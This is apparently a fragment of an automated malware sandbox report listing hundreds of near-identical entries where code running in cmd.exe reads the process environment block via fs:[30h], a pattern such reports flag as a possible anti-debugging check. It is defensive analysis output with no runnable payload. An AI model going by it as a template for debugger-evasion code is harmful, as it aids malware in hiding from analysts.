      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD92AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03BA92AB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B9F2AE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADC2B0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B042AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B042AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B5E289 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE7290 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE7290 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE7290 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADD2EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADD2EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD72E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B132C0 mov eax, dword ptr fs:[00000030h]15_2_03B132C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B132C0 mov eax, dword ptr fs:[00000030h]15_2_03B132C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB32C9 mov eax, dword ptr fs:[00000030h]15_2_03BB32C9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B032C5 mov eax, dword ptr fs:[00000030h]15_2_03B032C5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B00230 mov ecx, dword ptr fs:[00000030h]15_2_03B00230
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60227 mov eax, dword ptr fs:[00000030h]15_2_03B60227
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60227 mov eax, dword ptr fs:[00000030h]15_2_03B60227
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60227 mov eax, dword ptr fs:[00000030h]15_2_03B60227
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A22B mov eax, dword ptr fs:[00000030h]15_2_03B1A22B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A22B mov eax, dword ptr fs:[00000030h]15_2_03B1A22B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A22B mov eax, dword ptr fs:[00000030h]15_2_03B1A22B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6B214 mov eax, dword ptr fs:[00000030h]15_2_03B6B214
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6B214 mov eax, dword ptr fs:[00000030h]15_2_03B6B214
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA200 mov eax, dword ptr fs:[00000030h]15_2_03ADA200
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD821B mov eax, dword ptr fs:[00000030h]15_2_03AD821B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9D270 mov eax, dword ptr fs:[00000030h]15_2_03B9D270
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB273 mov eax, dword ptr fs:[00000030h]15_2_03ADB273
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB273 mov eax, dword ptr fs:[00000030h]15_2_03ADB273
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB273 mov eax, dword ptr fs:[00000030h]15_2_03ADB273
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0F24A mov eax, dword ptr fs:[00000030h]15_2_03B0F24A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F247 mov eax, dword ptr fs:[00000030h]15_2_03B9F247
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B141BB mov ecx, dword ptr fs:[00000030h]15_2_03B141BB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B141BB mov eax, dword ptr fs:[00000030h]15_2_03B141BB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B141BB mov eax, dword ptr fs:[00000030h]15_2_03B141BB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB51B6 mov eax, dword ptr fs:[00000030h]15_2_03BB51B6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B131BE mov eax, dword ptr fs:[00000030h]15_2_03B131BE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B131BE mov eax, dword ptr fs:[00000030h]15_2_03B131BE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E1A4 mov eax, dword ptr fs:[00000030h]15_2_03B1E1A4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E1A4 mov eax, dword ptr fs:[00000030h]15_2_03B1E1A4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21190 mov eax, dword ptr fs:[00000030h]15_2_03B21190
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21190 mov eax, dword ptr fs:[00000030h]15_2_03B21190
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B09194 mov eax, dword ptr fs:[00000030h]15_2_03B09194
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4180 mov eax, dword ptr fs:[00000030h]15_2_03AE4180
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4180 mov eax, dword ptr fs:[00000030h]15_2_03AE4180
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE4180 mov eax, dword ptr fs:[00000030h]15_2_03AE4180
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0F1F0 mov eax, dword ptr fs:[00000030h]15_2_03B0F1F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0F1F0 mov eax, dword ptr fs:[00000030h]15_2_03B0F1F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD81EB mov eax, dword ptr fs:[00000030h]15_2_03AD81EB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE91E5 mov eax, dword ptr fs:[00000030h]15_2_03AE91E5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE91E5 mov eax, dword ptr fs:[00000030h]15_2_03AE91E5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA1E3 mov eax, dword ptr fs:[00000030h]15_2_03AEA1E3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E0 mov eax, dword ptr fs:[00000030h]15_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA81EE mov eax, dword ptr fs:[00000030h]15_2_03BA81EE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA81EE mov eax, dword ptr fs:[00000030h]15_2_03BA81EE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD91F0 mov eax, dword ptr fs:[00000030h]15_2_03AD91F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD91F0 mov eax, dword ptr fs:[00000030h]15_2_03AD91F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01F1 mov eax, dword ptr fs:[00000030h]15_2_03AF01F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01F1 mov eax, dword ptr fs:[00000030h]15_2_03AF01F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01F1 mov eax, dword ptr fs:[00000030h]15_2_03AF01F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01C0 mov eax, dword ptr fs:[00000030h]15_2_03AF01C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF01C0 mov eax, dword ptr fs:[00000030h]15_2_03AF01C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C0 mov eax, dword ptr fs:[00000030h]15_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6A130 mov eax, dword ptr fs:[00000030h]15_2_03B6A130
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F13E mov eax, dword ptr fs:[00000030h]15_2_03B9F13E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B17128 mov eax, dword ptr fs:[00000030h]15_2_03B17128
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B17128 mov eax, dword ptr fs:[00000030h]15_2_03B17128
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE510D mov eax, dword ptr fs:[00000030h]15_2_03AE510D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10118 mov eax, dword ptr fs:[00000030h]15_2_03B10118
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF113 mov eax, dword ptr fs:[00000030h]15_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0510F mov eax, dword ptr fs:[00000030h]15_2_03B0510F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3717A mov eax, dword ptr fs:[00000030h]15_2_03B3717A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3717A mov eax, dword ptr fs:[00000030h]15_2_03B3717A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6179 mov eax, dword ptr fs:[00000030h]15_2_03AE6179
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1716D mov eax, dword ptr fs:[00000030h]15_2_03B1716D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA147 mov eax, dword ptr fs:[00000030h]15_2_03ADA147
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA147 mov eax, dword ptr fs:[00000030h]15_2_03ADA147
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA147 mov eax, dword ptr fs:[00000030h]15_2_03ADA147
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3157 mov eax, dword ptr fs:[00000030h]15_2_03BB3157
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3157 mov eax, dword ptr fs:[00000030h]15_2_03BB3157
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3157 mov eax, dword ptr fs:[00000030h]15_2_03BB3157
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1415F mov eax, dword ptr fs:[00000030h]15_2_03B1415F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB5149 mov eax, dword ptr fs:[00000030h]15_2_03BB5149
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7314A mov eax, dword ptr fs:[00000030h]15_2_03B7314A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB50B7 mov eax, dword ptr fs:[00000030h]15_2_03BB50B7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9B0AF mov eax, dword ptr fs:[00000030h]15_2_03B9B0AF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B200A5 mov eax, dword ptr fs:[00000030h]15_2_03B200A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8F0A5 mov eax, dword ptr fs:[00000030h]15_2_03B8F0A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB4080 mov eax, dword ptr fs:[00000030h]15_2_03BB4080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADC090 mov eax, dword ptr fs:[00000030h]15_2_03ADC090
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA093 mov ecx, dword ptr fs:[00000030h]15_2_03ADA093
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1D0F0 mov eax, dword ptr fs:[00000030h]15_2_03B1D0F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1D0F0 mov ecx, dword ptr fs:[00000030h]15_2_03B1D0F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD90F8 mov eax, dword ptr fs:[00000030h]15_2_03AD90F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADC0F6 mov eax, dword ptr fs:[00000030h]15_2_03ADC0F6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB0D6 mov eax, dword ptr fs:[00000030h]15_2_03ADB0D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB0D0 mov eax, dword ptr fs:[00000030h]15_2_03AFB0D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD02D mov eax, dword ptr fs:[00000030h]15_2_03ADD02D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22010 mov ecx, dword ptr fs:[00000030h]15_2_03B22010
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE8009 mov eax, dword ptr fs:[00000030h]15_2_03AE8009
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B05004 mov eax, dword ptr fs:[00000030h]15_2_03B05004
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B05004 mov ecx, dword ptr fs:[00000030h]15_2_03B05004
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B89060 mov eax, dword ptr fs:[00000030h]15_2_03B89060
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6074 mov eax, dword ptr fs:[00000030h]15_2_03AE6074
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE6074 mov eax, dword ptr fs:[00000030h]15_2_03AE6074
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7072 mov eax, dword ptr fs:[00000030h]15_2_03AE7072
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB505B mov eax, dword ptr fs:[00000030h]15_2_03BB505B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10044 mov eax, dword ptr fs:[00000030h]15_2_03B10044
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1051 mov eax, dword ptr fs:[00000030h]15_2_03AE1051
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1051 mov eax, dword ptr fs:[00000030h]15_2_03AE1051
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB17BC mov eax, dword ptr fs:[00000030h]15_2_03BB17BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE07A7 mov eax, dword ptr fs:[00000030h]15_2_03AE07A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAD7A7 mov eax, dword ptr fs:[00000030h]15_2_03BAD7A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAD7A7 mov eax, dword ptr fs:[00000030h]15_2_03BAD7A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAD7A7 mov eax, dword ptr fs:[00000030h]15_2_03BAD7A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B11796 mov eax, dword ptr fs:[00000030h]15_2_03B11796
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B11796 mov eax, dword ptr fs:[00000030h]15_2_03B11796
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
